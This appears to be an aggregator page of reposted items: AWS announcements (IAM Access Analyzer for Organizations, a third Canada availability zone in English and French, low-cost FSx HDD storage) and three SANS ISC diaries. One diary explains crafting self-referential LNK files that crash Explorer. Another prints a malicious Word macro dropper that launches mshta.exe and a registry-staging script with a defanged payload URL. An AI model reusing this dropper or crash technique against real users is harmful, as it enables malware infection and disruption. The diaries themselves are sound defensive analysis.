All posts by David

New – Use AWS IAM Access Analyzer in AWS Organizations

This post was originally published on this site

Last year at AWS re:Invent 2019, we released AWS Identity and Access Management (IAM) Access Analyzer that helps you understand who can access resources by analyzing permissions granted using policies for Amazon Simple Storage Service (S3) buckets, IAM roles, AWS Key Management Service (KMS) keys, AWS Lambda functions, and Amazon Simple Queue Service (SQS) queues.

AWS IAM Access Analyzer uses automated reasoning, a form of mathematical logic and inference, to determine all possible access paths allowed by a resource policy. We call these analytical results provable security, a higher level of assurance for security in the cloud.

Today I am pleased to announce that you can create an analyzer in the AWS Organizations master account or a delegated member account with the entire organization as the zone of trust. Now for each analyzer, you can create a zone of trust to be either a particular account or an entire organization, and set the logical bounds for the analyzer to base findings upon. This helps you quickly identify when resources in your organization can be accessed from outside of your AWS Organization.

AWS IAM Access Analyzer for AWS Organizations – Getting started
You can enable IAM Access Analyzer, in your organization with one click in the IAM Console. Once enabled, IAM Access Analyzer analyzes policies and reports a list of findings for resources that grant public or cross-account access from outside your AWS Organizations in the IAM console and through APIs.

When you create an analyzer on your organization, it recognizes your organization as a zone of trust, meaning all accounts within the organization are trusted to have access to AWS resources. Access analyzer will generate a report that identifies access to your resources from outside of the organization.

For example, if you create an analyzer for your organization then it provides active findings for resource such as S3 buckets in your organization that are accessible publicly or from outside the organization.

When policies change, IAM Access Analyzer automatically triggers a new analysis and reports new findings based on the policy changes. You can also trigger a re-evaluation manually. You can download the details of findings into a report to support compliance audits.

Analyzers are specific to the region in which they are created. You need to create a unique analyzer for each region where you want to enable IAM Access Analyzer.

You can create multiple analyzers for your entire organization in your organization’s master account. Additionally, you can also choose a member account in your organization as a delegated administrator for IAM Access Analyzer. When you choose a member account as the delegated administrator, the member account has a permission to create analyzers within the organization. Additionally individual accounts can create analyzers to identify resources accessible from outside those accounts.

IAM Access Analyzer sends an event to Amazon EventBridge for each generated finding, for a change to the status of an existing finding, and when a finding is deleted. You can monitor IAM Access Analyzer findings with EventBridge. Also, all IAM Access Analyzer actions are logged by AWS CloudTrail and AWS Security Hub. Using the information collected by CloudTrail, you can determine the request that was made to Access Analyzer, the IP address from which the request was made, who made the request, when it was made, and additional details.

Now available!
This integration is available in all AWS Regions where IAM Access Analyzer is available. There is no extra cost for creating an analyzer with organization as the zone of trust. You can learn more through these talks of Dive Deep into IAM Access Analyzer and Automated Reasoning on AWS at AWS re:Invent 2019. Take a look at the feature page and the documentation to learn more.

Please send us feedback either in the AWS forum for IAM or through your usual AWS support contacts.

Channy;

I’m awarded VMworld 2019 Distinguished Speaker

This post was originally published on this site

This morning, I received an e-mail message from Maryam Scoble:   VMworld 2019 Distinguished Speaker Dear Sander,   Congratulations on being named a VMworld 2019 Distinguished Speaker. This new program recognizes the hard work of VMworld speakers who maintain a survey score of 4.2 or higher, speaking at sessions with 150 attendees or more over […]

The post I’m awarded VMworld 2019 Distinguished Speaker appeared first on The things that are better left unspoken.

Now Open – Third Availability Zone in the AWS Canada (Central) Region

This post was originally published on this site

When you start an EC2 instance, or store data in an S3 bucket, it’s easy to underestimate what an AWS Region is. Right now, we have 22 across the world, and while they look like dots on a global map, they are architected to let you run applications and store data with high availability and fault tolerance. In fact, each of our Regions is made up of multiple data centers, which are geographically separated into what we call Availability Zones (AZs).

Today, I am very happy to announce that we added a third AZ to the AWS Canada (Central) Region to support our customer base in Canada.

This third AZ provides customers with additional flexibility to architect scalable, fault-tolerant, and highly available applications, and will support additional AWS services in Canada. We opened the Canada (Central) Region in December 2016, just over 3 years ago, and we’ve more than tripled the number of available services as we bring on this third AZ.

Each AZ is in a separate and distinct geographic location with enough distance to significantly reduce the risk of a single event impacting availability in the Region, yet near enough for business continuity applications that require rapid failover and synchronous replication. For example, our Canada (Central) Region is located in the Montreal area of Quebec, and the upcoming new AZ will be on the mainland more than 45 kms/28 miles away from the next-closest AZ as the crow flies.

Where we place our Regions and AZs is a deliberate and thoughtful process that takes into account not only latency or distance, but also risk profiles. To keep the risk profile low, we look at decades of data related to floods and other environmental factors before we settle on a location. Montreal was heavily impacted in 1998 by a massive ice storm that crippled the power grid and brought down more than 1,000 transmission towers, leaving four million people in neighboring provinces and some areas of New York and Maine without power. In order to ensure that AWS infrastructure can withstand inclement weather such as this, half of the AZs interconnections use underground cables and are out of the impact of potential ice storms. In this way, every AZ is connected to the other two AZs by at least one 100% underground fiber path.

We’re excited to bring a new AZ to Canada to serve our incredible customers in the region. Here are some examples from different industries, courtesy of my colleagues in Canada:

Healthcare – AlayaCare delivers cloud-based software to home care organizations across Canada and all over the world. As a home healthcare technology company, they need in-country data centers to meet regulatory requirements.

Insurance – Aviva is delivering a world-class digital experience to its insurance clients in Canada and the expansion of the AWS Region is welcome as they continue to move more of their applications to the cloud.

E-LearningD2L leverages various AWS Regions around the world, including Canada to deliver a seamless experience for their clients. They have been on AWS for more than four years, and recently completed an all-in migration.

With this launch, AWS has now 70 AZs within 22 geographic Regions around the world, plus 5 new regions coming. We are continuously looking at expanding our infrastructure footprint globally, driven largely by customer demand.

To see how we use AZs in Amazon, have look at this article on Static stability using Availability Zones by Becky Weiss and Mike Furr. It’s part of the Amazon Builders’ Library, a place where we share what we’ve learned over the years.

For more information on our global infrastructure, and the custom hardware we use, check out this interactive map.

Danilo


Une troisième zone de disponibilité pour la Région AWS Canada (Centre) est lancée

Lorsque vous lancez une instance EC2, ou que vous stockez vos données dans Amazon S3, il est facile de sous-estimer l’étendue d’une région infonuagique AWS. À l’heure actuelle, nous avons 22 régions dans le monde. Bien que ces dernières ne ressemblent qu’à des petits points sur une grande carte, elles sont conçues pour vous permettre de lancer des applications et de stocker des données avec une grande disponibilité et une tolérance aux pannes. En fait, chacune de nos régions comprend plusieurs centres de données distincts, regroupés dans ce que nous appelons des zones de disponibilités.

Aujourd’hui, je suis très heureux d’annoncer que nous avons ajouté une troisième zone de disponibilité à la Région AWS Canada (Centre) afin de répondre à la demande croissante de nos clients canadiens.

Cette troisième zone de disponibilité offre aux clients une souplesse additionnelle, leur permettant de concevoir des applications évolutives, tolérantes et hautement disponibles. Cette zone de disponibilité permettra également la prise en charge d’un plus grand nombre de services AWS au Canada. Nous avons ouvert la région infonuagique en décembre 2016, il y a un peu plus de trois ans, et nous avons plus que triplé le nombre de services disponibles en lançant cette troisième zone.

Chaque zone de disponibilité AWS se situe dans un lieu géographique séparé et distinct, suffisamment éloignée pour réduire le risque qu’un seul événement puisse avoir une incidence sur la disponibilité dans la région, mais assez rapproché pour permettre le bon fonctionnement d’applications de continuité d’activités qui nécessitent un basculement rapide et une réplication synchrone. Par exemple, notre Région Canada (Centre) se situe dans la région du grand Montréal, au Québec. La nouvelle zone de disponibilité sera située à plus de 45 km à vol d’oiseau de la zone de disponibilité la plus proche.

Définir l’emplacement de nos régions et de nos zones de disponibilité est un processus délibéré et réfléchi, qui tient compte non seulement de la latence/distance, mais aussi des profils de risque. Par exemple, nous examinons les données liées aux inondations et à d’autres facteurs environnementaux sur des décennies avant de nous installer à un endroit. Ceci nous permet de maintenir un profil de risque faible. En 1998, Montréal a été lourdement touchée par la tempête du verglas, qui a non seulement paralysé le réseau électrique et engendré l’effondrement de plus de 1 000 pylônes de transmission, mais qui a également laissé quatre millions de personnes sans électricité dans les provinces avoisinantes et certaines parties dans les états de New York et du Maine. Afin de s’assurer que l’infrastructure AWS résiste à de telles intempéries, la moitié des interconnexions câblées des zones de disponibilité d’AWS sont souterraines, à l’abri des tempêtes de verglas potentielles par exemple. Ainsi, chaque zone de disponibilité est reliée aux deux autres zones par au moins un réseau de fibre entièrement souterrain.

Nous nous réjouissons d’offrir à nos clients canadiens une nouvelle zone de disponibilité pour la région. Voici quelques exemples clients de différents secteurs, gracieuseté de mes collègues canadiens :

SantéAlayaCare fournit des logiciels de santé à domicile basés sur le nuage à des organismes de soins à domicile canadiens et partout dans le monde. Pour une entreprise de technologie de soins à domicile, le fait d’avoir des centres de données au pays est essentiel et lui permet de répondre aux exigences réglementaires.

AssuranceAviva offre une expérience numérique de classe mondiale à ses clients du secteur de l’assurance au Canada. L’expansion de la région AWS est bien accueillie alors qu’ils poursuivent la migration d’un nombre croissant de leurs applications vers l’infonuagique.

Apprentissage en ligneD2L s’appuie sur diverses régions dans le monde, dont celle au Canada, pour offrir une expérience homogène à ses clients. Ils sont sur AWS depuis plus de quatre ans et ont récemment effectué une migration complète.

Avec ce lancement, AWS compte désormais 70 zones de disponibilité dans 22 régions géographiques au monde – et cinq nouvelles régions à venir. Nous sommes continuellement à la recherche de moyens pour étendre notre infrastructure à l’échelle mondiale, entre autres en raison de la demande croissante des clients.

Pour comprendre comment nous utilisons les zones de disponibilité chez Amazon, consultez cet article sur la stabilité statique à l’aide des zones de disponibilité par Becky Weiss et Mike Furr. Ce billet se retrouve dans la bibliothèque des créateurs d’Amazon, un lieu où nous partageons ce que nous avons appris au fil des années.

Pour plus d’informations sur notre infrastructure mondiale et le matériel informatique personnalisé que nous utilisons, consultez cette carte interactive.

Danilo

Crashing explorer.exe with(out) a click, (Mon, Mar 30th)

This post was originally published on this site

In a couple of my recent diaries, we discussed two small unpatched vulnerabilities/weaknesses in Windows. One, which allowed us to brute-force contents of folders without any permissions[1], and another, which enabled us to change names of files and folders without actually renaming them[2]. Today, we’ll add another vulnerability/weakness to the collection – this one will allow us to cause a temporary DoS condition for the Explorer process (i.e. we will crash it) and/or for other processes. It is interesting since all that is required for it to work is that a user opens a link or visits a folder with a specially crafted file.

The vulnerability lies in the way in which URL links (.URL files) and Shell Links (.LNK files) are handled by Windows when they are self-referential (i.e. they “link to themselves”). The principle behind the vulnerability is not new – a similar issue was supposedly present in the early versions of Windows 7 with self-referential symlinks – but since I didn’t find any write-up for the issue with URLs and LNKs, I thought I’d share this version of the vulnerability here. I should mention that I informed Microsoft of the issue and they decided not to patch it due to its limited impact.

With URL links, crafting a self-referential one is quite simple. URL shortcuts are basically just INI files and you may create one in the same way you would create a LNK shortcut (i.e. right click in a folder -> New -> Shortcut), you just have to input URL as the target. If we were to create a shortcut this way, which points to https://isc.sans.edu/, we would end up with following contents inside the resulting URL file.

The structure is quite simple, but we may simplify it further still, since for our purposes, we only need to specify the [InternetShortcut] section and a target for the link. A file with the following contents will work the same way as the previous one.

In order to create a self-referential URL file, we simply need to point the URL property to the path where our file is located.

If we try to open this file, the Explorer process will crash and after a while, it will be started again.

This is intriguing behavior and since the mechanism works for remote file shares as well (and since we may change the icon which is displayed for the URL file), a specially crafted URL link might be used quite easily to pull a prank on someone. Besides it being a potential tool for use during the April Fools’ day, however, there don’t seem to be many uses for a self-referential URL.

Self-referential Shell Links, on the other hand, could be quite handy in certain red teaming situations. This is because in case of LNK files, one doesn’t need to interact with them directly in any way in order to cause Explorer to crash, it is enough to open the folder in which they are located.

This is due to the interesting way in which Windows handles Shell Links. To demonstrate the behavior of Windows when a user opens a folder in which a LNK file is located, I created a shortcut, which points to calc.exe, and placed in in the folder C:PoC. As you may see from the output from Process Monitor bellow, which shows what happened when I opened the PoC folder, the Explorer process automatically found the target file (C:system32.calc.exe) and accessed it.

Although this behavior is quite interesting by itself, the fact that Explorer tries to access target of a LNK file when a folder, inside which it is placed, is opened is sufficient for our purposes.

At this point, we may try to create a self-referential LNK. However, if we simply try to point existing Shell Link file back on itself (or point it to any other LNK), Windows will stop us, because creating a shortcut to another shortcut is not allowed.

Since Shell Links have a binary format, making them point to themselves “manually” isn’t as straightforward as in the case of URL files. With a hex editor and with a little help from the official documentation[3], it still isn’t too difficult though.

The only potential snag is that Shell Link files really aren’t meant to point to other LNKs and to enable this behavior, we need to set a special flag in the header of the Shell Link called “AllowLinkToLink“ (i.e. add 0x80 to byte at offset 0x16)[4].

If we try to access a folder, inside which the LNK is placed, Explorer will indeed crash and then start up again.

If you’d like to try this out on your own system, I prepared a sample Shell Link file to make it easier. You may download it from https://untrustednetwork.net/files/ISC/2020/infinilink.zip (password is “infected”) and unzip the “infinilink” directory to your C drive. It works from certain other locations as well, but I would caution against putting the downloaded LNK directly on a Desktop.

Although it should be harmless (besides causing the Explorer process to crash, that is), I would also recommend that you only try it in a backed up virtual environment.

For completeness sake, I should mention that explorer.exe isn’t the only process we may crash this way. Any application, which uses one of the standard Windows file dialogs (i.e. Open File dialog, Save File dialog, etc.) is susceptible and will crash if the dialog window is used to open a folder containing a self-referential LNK.

[1] https://isc.sans.edu/diary/25816
[2] https://isc.sans.edu/diary/25912
[3] https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/16cb4ca1-9339-4d0c-a68d-bf1d6cc0f943
[4] https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/ae350202-3ba9-4790-9e9e-98935f4ee5af

———–
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Obfuscated Excel 4 Macros, (Sun, Mar 29th)

This post was originally published on this site

2 readers (anonymous and Robert) submitted very similar malicious spreadsheets with almost no detections on VT: c1394e8743f0d8e59a4c7123e6cd5298 and a03ae50077bf6fad3b562241444481c1.

These files contain Excel 4 macros (checking with oledump.py here):

There are a lot of cells in this spreadsheet with a call to the CHAR function:

These CHAR formulas evaluate to ASCII characters, that are then concatenated together and evaluated as formulas:

I can extract the integer argument of each CHAR function like this with my tool re-search.py:

That can then be converted to characters using my tool numbers-to-string.py:

The string above is build-up of all the cells with function CHAR in the spreadsheet. That’s why the produced string looks promising, but the characters don’t seem to be in the right order.

Selecting characters on the same row doesn’t help:

But selecting by column does reveal the formulas:

Analyzing obfuscated Excel 4 macros with a command-line tool like this can be difficult, and it can be easier to view the Excel 4 macro sheet inside a VM (this sheet was very hidden):

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Covid19 Domain Classifier, (Sat, Mar 28th)

This post was originally published on this site

Johannes started a Covid19 Domain Classifier here on our Internet Storm Center site.

From SANS NewsBites Vol. 22 Num. 025:

Help Us Classify COVID-19 Related Domains

These last couple of weeks, criminals have been using COVID-19 for everything from selling fake cures to phishing. Every day, several thousand domains are registered for COVID-19 related keywords. We are trying to identify the worst, and classify the domains into different risk categories. If you have some time this weekend, please help us out by checking out some of these domains. To participate, see https://isc.sans.edu/covidclassifier.html. The domain data is based on a feed provided by Domaintools and we will make the results of this effort public for download as soon as we have a “critical mass” of responses.

When you log in with your account to the SANS ISC site, you’ll get a list of 10 domains to classify, like this:

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Malicious JavaScript Dropping Payload in the Registry, (Fri, Mar 27th)

This post was originally published on this site

When we speak about “fileless” malware, it means that the malware does not use the standard filesystem to store temporary files or payloads. But they need to write data somewhere in the system for persistence or during the infection phase. If the filesystem is not used, the classic way to store data is to use the registry. Here is an example of a malicious JavaScript code that uses a temporary registry key to drop its payload (but it also drops files in a classic way).

The malware was delivered via a Microsoft Word document:

remnux@remnux:/malwarezoo/20200327$ oledump.py information_03.26.doc 
A: word/vbaProject.bin
 A1:       576 'PROJECT'
 A2:       104 'PROJECTwm'
 A3: m    1127 'VBA/ThisDocument'
 A4:      3798 'VBA/_VBA_PROJECT'
 A5:      2201 'VBA/__SRP_0'
 A6:       206 'VBA/__SRP_1'
 A7:       348 'VBA/__SRP_2'
 A8:       106 'VBA/__SRP_3'
 A9: M    2319 'VBA/a4bLF'
A10: M    2026 'VBA/acpqnS'
A11: M    2457 'VBA/ajzdY'
A12:       913 'VBA/dir'
A13: m    1171 'VBA/f'
A14:        97 'f/x01CompObj'
A15:       284 'f/x03VBFrame'
A16:        86 'f/f'
A17:     37940 'f/o'

Several macros are present and are easy to decode:

Sub AutoOpen()
  main
End Sub

And:

Sub main()
  ajKTO = StrReverse(ae5RXS("e$x$e$.$a$t$h$s$m$$2$3$m$e$t$s$y$s$$s$w$o$d$n$i$w$$:$c$", "$", ""))
  akYREj = StrReverse(aQqnur("m$o$c$.$t$f$o$s$o$r$c$i$m$$a$t$a$d$m$a$r$g$o$r$p$$:$c$", "$", ""))
  aXlTxC = StrReverse(airmZ6("l$m$t$h$.$x$e$d$n$i$$a$t$a$d$m$a$r$g$o$r$p$$:$c$", "$", ""))
  Call VBA.FileCopy(ajKTO, akYREj)
  Set axe16 = f.i
  atk8Jw aXlTxC, axe16.value
  Shell akYREj & " " & aXlTxC
End Sub

The three lines containing StrReverse() are easy to deobfuscate, you just have to remove the ‘$’ characters and reverse the string:

StrReverse(ae5RXS(“e$x$e$.$a$t$h$s$m$$2$3$m$e$t$s$y$s$$s$w$o$d$n$i$w$$:$c$”, “$”, “”)) = “c:windowssystem32mshta.exe”
StrReverse(aQqnur(“m$o$c$.$t$f$o$s$o$r$c$i$m$$a$t$a$d$m$a$r$g$o$r$p$$:$c$”, “$”, “”)) = “c:programdatamicrosoft.com”
StrReverse(airmZ6(“l$m$t$h$.$x$e$d$n$i$$a$t$a$d$m$a$r$g$o$r$p$$:$c$”, “$”, “”)) = c:programdataindex.html

The function atk8Jw() dumps the payload:

Public Function atk8Jw(ar9a1t, afn6Jc)
  Open ar9a1t For Output As #1
  Print #1, afn6Jc
  Close #1
End Function

The file index.html is created based on the content of a hidden form in the Word document (called ‘f’).

The second stage is executed via mshta.exe. This piece of code uses the registry to dump the next stage:

<p id="content">6672613771647572613771646e726137 ...(very long string)... 2613771642972613771643b7261377164</p>
...
var aYASdB = "HKEY_CURRENT_USERSoftwaresoftkey";
...
aB9lM.RegWrite(aYASdB, a0KxU.innerHTML, "REG_SZ");
...
aUayK = aB9lM.RegRead(aYASdB)
...
aB9lM.RegDelete(aYASdB)

The content is the ‘id’ HTML element is hex-encoded and obfuscated with garbage characters. Once decoded, we have a new bunch of obfuscated code.

It fetches the next stage from this URL: 

hxxp://his3t35rif0krjkn[.]com/kundru/targen.php?l=swep4.cab

Unfortunately, the file was already removed and I was not able to continue the analyzis…

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

New – Low-Cost HDD Storage Option for Amazon FSx for Windows File Server

This post was originally published on this site

You can use Amazon FSx for Windows File Server to create file systems that can be accessed from a wide variety of sources and that use your existing Active Directory environment to authenticate users. Last year we added a ton of features including Self-Managed Directories, Native Multi-AZ File Systems, Support for SQL Server, Fine-Grained File Restoration, On-Premises Access, a Remote Management CLI, Data Deduplication, Programmatic File Share Configuration, Enforcement of In-Transit Encryption, and Storage Quotas.

New HDD Option
Today we are adding a new HDD (Hard Disk Drive) storage option to Amazon FSx for Windows File Server. While the existing SSD (Solid State Drive) storage option is designed for the highest performance latency-sensitive workloads like databases, media processing, and analytics, HDD storage is designed for a broad spectrum of workloads including home directories, departmental shares, and content management systems.

Single-AZ HDD storage is priced at $0.013 per GB-month and Multi-AZ HDD storage is priced at $0.025 per GB-month (this makes Amazon FSx for Windows File Server the lowest cost file storage for Windows applications and workloads in the cloud). Even better, if you use this option in conjunction with Data Deduplication and use 50% space savings as a reasonable reference point, you can achieve an effective cost of $0.0065 per GB-month for a single-AZ file system and $0.0125 per GB-month for a multi-AZ file system.

You can choose the HDD option when you create a new file system:

If you have existing SSD-based file systems, you can create new HDD-based file systems and then use AWS DataSync or robocopy to move the files. Backups taken from newly created SSD or HDD file systems can be restored to either type of storage, and with any desired level of throughput capacity.

Performance and Caching
The HDD storage option is designed to deliver 12 MB/second of throughput per TiB of storage, with the ability to handle bursts of up to 80 MB/second per TiB of storage. When you create your file system, you also specify the throughput capacity:

The amount of throughput that you provision also controls the size of a fast, in-memory cache for your file share; higher levels of throughput come with larger amounts of cache. As a result, Amazon FSx for Windows File Server file systems can be provisioned so as to be able to provide over 3 GB/s of network throughput and hundreds of thousands of network IOPS, even with HDD storage. This will allow you to create cost-effective file systems that are able to handle many different use cases, including those where a modest subset of a large amount of data is accessed frequently. To learn more, read Amazon FSx for Windows File Server Performance.

Now Available
HDD file systems are available in all regions where Amazon FSx for Windows File Server is available and you can start creating them today.

Jeff;